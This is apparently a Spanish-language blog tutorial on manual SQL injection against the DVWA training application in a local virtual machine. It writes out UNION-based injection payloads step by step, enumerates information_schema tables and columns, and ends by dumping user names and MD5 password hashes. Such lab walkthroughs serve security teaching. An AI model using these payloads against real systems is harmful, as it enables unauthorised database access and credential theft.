Una vez descargada y arrancada la maquina virtual, debería de aparecer una pantalla similar.
 |
| Maquina virtual funcionando |
Para conectarnos a la maquina virtual desde el navegador, nos fijaremos en la IP asignada y accederemos mediante el siguiente enlace http://192.168.56.101/login.php
 |
| Pantalla login DVWA |
Una vez que hayamos entrado, seguiremos los pasos 7, 8 y 9 de la lección 6 del manual de inyección SQL.
Paso 7.
Los datos de acceso son: Username: admin Password: password
Los datos de acceso son: Username: admin Password: password
Paso 8.
Consiste en cambiar el nivel de seguridad "DVWA Security" de high a low y hacer click en "Submit".
 | |
| DVWA Security |
Paso 9.
Inyección manual SQL "SQL Injection"
Inyección manual SQL "SQL Injection"
 |
| SQL Injection |
Modos básicos de inyección SQL.
Ejemplo 1, escribir un 1 en "User ID:" y "Submit"
 |
| Resultado de escribir 1 |
El resultado obtenido, es una sentencia sql.
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
Ejemplo 2, siempre será True %' or '0'='0
La intención de esta sentencia es, visualizar todo lo que sea falso o verdadero.
%' probablemente no será igual a nada y el resultado será falso.
'0'='0 Es igual a verdadero, porque 0 siempre será igual a 0
Sentencia sql.
mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
 |
| Resultado sentencia %' or '0'='0 |
ID: %' or 0=0 union select null, version() # First name: admin Surname: admin ID: %' or 0=0 union select null, version() # First name: Gordon Surname: Brown ID: %' or 0=0 union select null, version() # First name: Hack Surname: Me ID: %' or 0=0 union select null, version() # First name: Pablo Surname: Picasso ID: %' or 0=0 union select null, version() # First name: Bob Surname: Smith ID: %' or 0=0 union select null, version() # First name: Surname: 5.5.44-0+deb8u1
En el campo surname, aparece la versión de la base de datos mysql 5.5.44-0+deb8u1
Ejemplo 4, usuario base de datos. %' or 0=0 union select null, user() #
ID: %' or 0=0 union select null, user() # First name: admin Surname: admin ID: %' or 0=0 union select null, user() # First name: Gordon Surname: Brown ID: %' or 0=0 union select null, user() # First name: Hack Surname: Me ID: %' or 0=0 union select null, user() # First name: Pablo Surname: Picasso ID: %' or 0=0 union select null, user() # First name: Bob Surname: Smith ID: %' or 0=0 union select null, user() # First name: Surname: dvwa@localhost
de igual manera que se podía visualizar la versión de la base de datos, también se visualiza el nombre de usuario dvwa@localhost que ejecuta el código PHP.
Ejemplo 5, nombre de la base de datos. %' or 0=0 union select null, database() #
ID: %' or 0=0 union select null, database() # First name: admin Surname: admin ID: %' or 0=0 union select null, database() # First name: Gordon Surname: Brown ID: %' or 0=0 union select null, database() # First name: Hack Surname: Me ID: %' or 0=0 union select null, database() # First name: Pablo Surname: Picasso ID: %' or 0=0 union select null, database() # First name: Bob Surname: Smith ID: %' or 0=0 union select null, database() # First name: Surname: dvwa
El nombre de la base de datos es dvwa
Ejemplo 6, visualizar todas las tablas de information_schema
%' and 1=0 union select null, table_name from information_schema.tables #
Información de todas las tablas de information_schema
ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: CHARACTER_SETS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: COLLATIONS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: COLLATION_CHARACTER_SET_APPLICABILITY ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: COLUMNS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: COLUMN_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: ENGINES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: EVENTS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: FILES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: GLOBAL_STATUS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: GLOBAL_VARIABLES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: KEY_COLUMN_USAGE ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PARAMETERS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PARTITIONS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PLUGINS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PROCESSLIST ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PROFILING ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: REFERENTIAL_CONSTRAINTS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: ROUTINES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: SCHEMATA ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: SCHEMA_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: SESSION_STATUS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: SESSION_VARIABLES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: STATISTICS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TABLES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TABLESPACES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TABLE_CONSTRAINTS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TABLE_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TRIGGERS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: USER_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: VIEWS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_BUFFER_PAGE ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_TRX ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_BUFFER_POOL_STATS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_LOCK_WAITS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_CMPMEM ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_CMP ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_LOCKS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_CMPMEM_RESET ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_CMP_RESET ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_BUFFER_PAGE_LRU ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: guestbook ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: users
Ejemplo 7, visualizar todas la tablas que tengan el prefijo "User", en la tabla users se encuentran los passwords.
Setencia SQL %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Información de todas las tablas que tengan prefijo "User"
ID: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# First name: Surname: USER_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# First name: Surname: users
Ejemplo 8, visualizar todos los campos de columna de information_schema tabla user
Sentencia sql: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Información de la tabla user, se identifican los siguientes campos: user_id, first_name, last_name, user, password, avatar
ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # First name: Surname: users user_id ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # First name: Surname: users first_name ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # First name: Surname: users last_name ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # First name: Surname: users user ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # First name: Surname: users password ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # First name: Surname: users avatar
Ejemplo 9, visualizar el contenido de information_schema tabla user
la sentencia sql
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Resultado de la consulta sql, aparece el contenido de todos los campos incluido el password.
ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # First name: Surname: admin admin admin 5f4dcc3b5aa765d61d8327deb882cf99 ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # First name: Surname: Gordon Brown gordonb e99a18c428cb38d5f260853678922e03 ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # First name: Surname: Hack Me 1337 8d3533d75ae2c3966d7e0d4fcc69216b ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # First name: Surname: Pablo Picasso pablo 0d107d09f5bbe40cade3de5c71e9e9b7 ID: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # First name: Surname: Bob Smith smithy 5f4dcc3b5aa765d61d8327deb882cf99
0 comentarios:
Publicar un comentario